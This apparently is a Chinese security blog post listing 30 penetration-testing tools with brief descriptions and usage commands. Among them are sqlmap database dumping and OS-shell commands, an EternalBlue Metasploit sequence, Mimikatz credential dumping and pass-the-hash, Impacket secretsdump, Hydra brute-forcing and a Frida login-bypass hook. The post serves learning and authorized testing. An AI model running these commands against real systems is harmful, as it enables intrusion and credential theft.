【前言】工欲善其事,必先利其器。做网络安全,工具就是我们的武器。今天给大家整理了30款网安人必备的工具,从入门到进阶全覆盖,每一款都是我亲测好用的。建议收藏,用到的时候直接翻!
一、信息收集类(5款)
1. Nmap —— 端口扫描之王
官网:nmap.org
平台:Windows / Linux / macOS
Nmap就不用多介绍了吧,渗透测试必备神器。功能强大到离谱,端口扫描、服务识别、操作系统探测、脚本扫描样样精通。
nmap-sV-sC-O192.168.1.0/24# 全端口+服务+脚本+系统探测nmap -p--T4192.168.1.1# 全端口快速扫描nmap--scriptvuln192.168.1.1# 漏洞扫描脚本小技巧:配合Zenmap(图形界面)使用更直观,新手友好。
2. Masscan —— 全网最快端口扫描器
官网:github.com/robertdavidgraham/masscan
平台:Linux / macOS
号称"5分钟扫遍全网",速度比Nmap快上百倍。适合大网段快速端口发现,然后用Nmap做精细扫描。
masscan -p80,443,22,3306192.168.0.0/16--rate=100003. dirsearch —— 目录扫描神器
官网:github.com/maurosoria/dirsearch
平台:全平台(Python)
Web渗透必备的目录/文件扫描工具,比御剑好用,字典丰富,速度快。
python3 dirsearch.py-uhttp://target.com-ephp,html,js4. subfinder —— 子域名挖掘机
官网:github.com/projectdiscovery/subfinder
平台:全平台(Go语言)
ProjectDiscovery出品的子域名枚举工具,速度快、源多、准确率高。配合httpx使用效果更佳。
subfinder-dtarget.com-all-silent|httpx-title-tech-detect -status-code5. theHarvester —— 信息收集瑞士军刀
官网:github.com/laramies/theHarvester
平台:Linux / macOS
综合信息收集工具,可以收集子域名、邮箱、主机名、员工姓名等信息,来源包括搜索引擎、PGP服务器、Shodan等。
theHarvester-dtarget.com-ball二、Web渗透类(6款)
6. Burp Suite —— Web渗透第一神器
官网:portswigger.net/burp
平台:全平台(Java)
Web渗透测试的标配,没有之一。代理、爬虫、扫描、 Intruder、Repeater、Decoder、Comparer……功能多到用不完。
核心模块:
- Proxy—— 拦截修改HTTP/HTTPS请求
- Repeater—— 重放请求,手动测试
- Intruder—— 自动化爆破(账号、密码、验证码等)
- Scanner—— 主动/被动漏洞扫描(专业版)
- Decoder—— 编码解码转换
- Comparer—— 对比两个响应的差异
新手必装插件:HackBar、Wappalyzer、Cookie-Editor、Proxy SwitchyOmega
7. sqlmap —— SQL注入自动化神器
官网:sqlmap.org
平台:全平台(Python)
SQL注入界的扛把子,支持几乎所有数据库和所有注入类型。新手用它一把梭,老鸟用它省时间。
sqlmap-u"http://target.com/page?id=1"--dbs# 爆数据库sqlmap-u"http://target.com/page?id=1"-Ddb--tables# 爆表sqlmap-u"http://target.com/page?id=1"-Ddb-Tuser--columns# 爆字段sqlmap-u"http://target.com/page?id=1"--os-shell# 拿shellsqlmap-rrequest.txt--tamper=space2comment# 绕过WAF常用tamper脚本:space2comment、between、randomcase、charencode、unionalltounion
8. XSStrike —— XSS检测与利用工具
官网:github.com/s0md3v/XSStrike
平台:全平台(Python)
比XSS Scanner好用N倍的XSS检测工具,支持GET/POST、爬虫、WAF检测、payload生成。
python3 xsstrike.py-u"http://target.com/search?q=test"python3 xsstrike.py-u"http://target.com/form"--data"q=test"python3 xsstrike.py-u"http://target.com"--crawl9. nuclei —— 基于模板的漏洞扫描器
官网:github.com/projectdiscovery/nuclei
平台:全平台(Go语言)
ProjectDiscovery出品,基于YAML模板的漏洞扫描器。社区贡献了海量的POC模板,新漏洞出来当天就能用上。批量挖洞神器。
nuclei-uhttps://target.com-tcves/# 扫CVE漏洞nuclei-lurls.txt-ttechnologies/# 批量指纹识别nuclei-uhttps://target.com-tmisconfiguration/# 配置错误扫描nuclei-uhttps://target.com-scritical,high# 只扫高危以上10. OWASP ZAP —— 开源Web应用扫描器
官网:zaproxy.org
平台:全平台(Java)
开源免费的Web应用安全扫描器,功能类似Burp,但完全免费。适合预算有限的团队和个人学习使用。
11. AWVS —— 自动化Web漏洞扫描
官网:invicti.com(原Acunetix)
平台:Windows / Linux
商业级Web漏洞扫描器,扫描速度快、准确率高、误报率低。企业做合规检查和批量扫描必备。
三、抓包分析类(4款)
12. Wireshark —— 网络抓包分析神器
官网:wireshark.org
平台:全平台
最流行的网络协议分析工具,没有之一。支持上千种协议的解析,排查网络问题、分析恶意流量、做CTF题都离不开它。
常用过滤语法:
ip.addr == 192.168.1.1 # 按IP过滤 tcp.port == 80 # 按端口过滤 http.request.method == GET # 按HTTP方法过滤 dns.qry.name == "test.com" # 按DNS查询过滤 tls.handshake.type == 1 # TLS ClientHello13. tcpdump —— 命令行抓包工具
官网:tcpdump.org
平台:Linux / macOS / Unix
Linux下最常用的命令行抓包工具,轻量、快速、稳定。服务器上排查问题首选。
tcpdump-ieth0-wcapture.pcap# 抓包保存到文件tcpdump-ieth0 tcp port80# 只抓80端口的TCP包tcpdump-rcapture.pcap# 读取抓包文件tcpdump-ieth0-nn-X-s0host1.1.1.1# 详细显示数据包内容14. Charles —— Mac/iOS抓包神器
官网:charlesproxy.com
平台:macOS / Windows / Linux
Mac和iOS开发/测试人员最爱用的抓包工具,界面友好,功能强大,支持SSL代理、断点、重写、映射等。
15. Fiddler —— Windows抓包神器
官网:telerik.com/fiddler
平台:Windows为主
Windows平台下最流行的HTTP/HTTPS抓包工具,插件丰富,调试Web应用非常方便。
四、内网渗透类(5款)
16. Metasploit —— 渗透测试框架之王
官网:metasploit.com
平台:Linux / macOS / Windows
最著名的渗透测试框架,漏洞利用、后渗透、payload生成、免杀……功能全到离谱。学渗透,MSF是绕不开的。
常用模块:
- auxiliary—— 辅助模块(扫描、爆破、信息收集)
- exploits—— 漏洞利用模块
- payloads—— 攻击载荷(meterpreter、shell等)
- post—— 后渗透模块(提权、信息收集、横向移动)
- encoders—— 编码模块(免杀用)
msfconsole# 启动MSFsearch ms17_010# 搜索漏洞use exploit/windows/smb/ms17_010_eternalblue# 使用模块setRHOSTS192.168.1.1# 设置目标run# 执行攻击17. Cobalt Strike —— 红队作战指挥中心
官网:cobaltstrike.com
平台:全平台(Java)
红队必备神器,分布式C2框架。多人协作、横向移动、权限维持、钓鱼、免杀……功能强大到没朋友,就是价格有点贵。
18. Mimikatz —— 密码抓取神器
官网:github.com/gentilkiwi/mimikatz
平台:Windows
Windows密码抓取界的传奇。可以从内存中抓取明文密码、NTLM哈希、Kerberos票据等。内网渗透必备。
privilege::debug# 提升调试权限sekurlsa::logonpasswords# 抓取登录密码sekurlsa::pth /user:admin /domain:test /ntlm:xxx# Pass-the-Hashkerberos::golden...# 制作黄金票据19. Impacket —— 内网渗透工具集
官网:github.com/fortra/impacket
平台:全平台(Python)
Python编写的Windows网络协议工具集,内网渗透神器。包含wmiexec、psexec、smbexec、secretsdump等一堆好用的工具。
wmiexec.py admin:password@192.168.1.1# WMI执行命令psexec.py admin:password@192.168.1.1# PsExec获取shellsecretsdump.py admin:password@192.168.1.1# 导出SAM和LSA哈希smbclient.py admin:password@192.168.1.1# SMB客户端GetNPUsers.py test/ -dc-ip192.168.1.1# AS-REP Roasting20. CrackMapExec —— 内网瑞士军刀
官网:github.com/mpgn/CrackMapExec
平台:Linux / macOS / Windows
后起之秀的内网渗透工具,SMB、RDP、WinRM、MSSQL、SSH一把梭。批量扫网段、爆破、执行命令、枚举信息,非常好用。
cme smb192.168.1.0/24# 扫描存活主机cme smb192.168.1.0/24-uadmin-p'P@ss123'# 密码验证cme smb192.168.1.0/24-uadmin-Hhash--shares# 枚举共享cme winrm192.168.1.10-uadmin-p'P@ss123'-x'whoami'# 执行命令五、逆向分析类(4款)
21. IDA Pro —— 逆向工程之王
官网:hex-rays.com/ida-pro/
平台:Windows / Linux / macOS
逆向分析界的绝对王者,反汇编+F5伪代码,功能强大到无以复加。做逆向、搞Pwn、分析病毒,IDA是吃饭的家伙。就是价格……emmm……大家懂的。
22. Ghidra —— 开源逆向工具新贵
官网:ghidra-sre.org
平台:全平台(Java)
NSA开源的逆向工具,功能直逼IDA Pro,关键是免费!对新手友好,社区活跃,插件越来越多。预算有限的同学强烈推荐。
23. x64dbg —— Windows动态调试神器
官网:x64dbg.com
平台:Windows
Windows下最好用的开源调试器,32位和64位都支持。界面友好、插件丰富,替代OllyDbg的最佳选择。
24. Frida —— 动态插桩工具
官网:frida.re
平台:全平台
动态二进制插桩工具,可以Hook函数、修改参数、篡改返回值。Android逆向和iOS逆向必备,不用脱壳就能分析APP。
// Frida Hook示例:Hook Java方法Java.perform(function(){varMainActivity=Java.use("com.example.MainActivity");MainActivity.checkPassword.implementation=function(pwd){console.log("输入的密码:"+pwd);returntrue;// 直接返回true,绕过验证};});六、其他实用工具(6款)
25. Kali Linux —— 渗透测试专用系统
官网:kali.org
平台:全平台
做渗透测试的标配系统,预装了上百款安全工具,开箱即用。新手入门的最佳选择,不用一个个装工具。
推荐:虚拟机里装Kali,宿主机用Windows或Mac,日常用宿主机,做测试切到Kali。
26. pwntools —— CTF Pwn神器
官网:github.com/Gallopsled/pwntools
平台:Linux / macOS
Python编写的CTF Pwn题框架,写exp必备。远程连接、本地调试、ROP链构建、shellcode生成,一条龙服务。
frompwnimport*p=remote('target.com',1234)# p = process('./vuln') # 本地调试payload=b'A'*0x20+p64(0xdeadbeef)+p64(0x401234)p.sendline(payload)p.interactive()27. Hashcat —— 密码破解之王
官网:hashcat.net
平台:全平台
世界上最快的密码恢复工具,支持GPU加速,支持几百种哈希类型。破解各种密码哈希都靠它。
hashcat-m0md5_hashes.txt wordlist.txt# 破解MD5hashcat-m1000ntlm_hashes.txt wordlist.txt# 破解NTLMhashcat-m3200bcrypt_hashes.txt wordlist.txt# 破解bcrypthashcat-m2500handshake.hccapx wordlist.txt# 破解WiFi密码28. Hydra —— 暴力破解神器
官网:github.com/vanhauser-thc/thc-hydra
平台:Linux / macOS
支持超多协议的暴力破解工具,SSH、FTP、SMB、RDP、HTTP表单、MySQL……几乎你能想到的协议都支持。
hydra-ladmin-Ppass.txt192.168.1.1ssh# SSH爆破hydra-Lusers.txt-Ppass.txt192.168.1.1ftp# FTP爆破hydra-ladmin-Ppass.txt192.168.1.1 smb# SMB爆破hydra-ladmin-Ppass.txt192.168.1.1 rdp# RDP爆破29. SearchSploit —— 漏洞利用搜索
官网:exploit-db.com/searchsploit
平台:Linux / macOS / Windows
Exploit-DB的离线版本,可以快速搜索已知漏洞的POC和exp。做渗透测试的时候快速查一下,说不定有惊喜。
searchsploit smb# 搜索SMB相关漏洞searchsploit-mwindows/remote/42315.py# 复制exp到当前目录30. Wfuzz —— Web模糊测试工具
官网:github.com/xmendez/wfuzz
平台:全平台(Python)
Web应用模糊测试工具,可以爆破目录、参数、用户名、密码等。灵活度非常高,支持各种payload和过滤器。
wfuzz-c-zfile,wordlist.txt-uhttp://target.com/FUZZ# 目录爆破wfuzz-c-zfile,users.txt-zfile,pass.txt-d"user=FUZZ&pass=FUZ2Z"http://target.com/login# 表单爆破七、工具使用心法
最后分享几个我自己的心得:
1. 工具只是工具,思路才是核心
不要沉迷于收集工具,更重要的是理解原理和培养思维。同样一把刀,在厨师手里是艺术品,在莽夫手里只能切菜。
2. 精通几款常用的就够了
不用每款工具都玩得很溜,把最常用的几款(Burp、Nmap、sqlmap、MSF)用精通,比什么都懂一点强得多。
3. 能自己写工具就自己写
当你能用Python写出自己的小工具的时候,说明你真的入门了。自动化脚本、POC编写、爬虫、扫描器……写过一遍理解完全不一样。
4. 关注工具的更新
安全圈变化很快,工具也在不断更新。保持关注,及时升级,新功能可能帮你省很多时间。
5. 合法使用,不要越界
所有工具都只能在授权的情况下使用,不要拿去搞事情。技术是中性的,但人要有底线。
【粉丝福利】我把整理好的《网安工具大礼包》(含30+款工具安装包、常用字典、payload库、常用命令速查表)免费发给你!
以上工具均仅用于合法授权的安全测试和学习研究。请遵守法律法规,非法使用后果自负。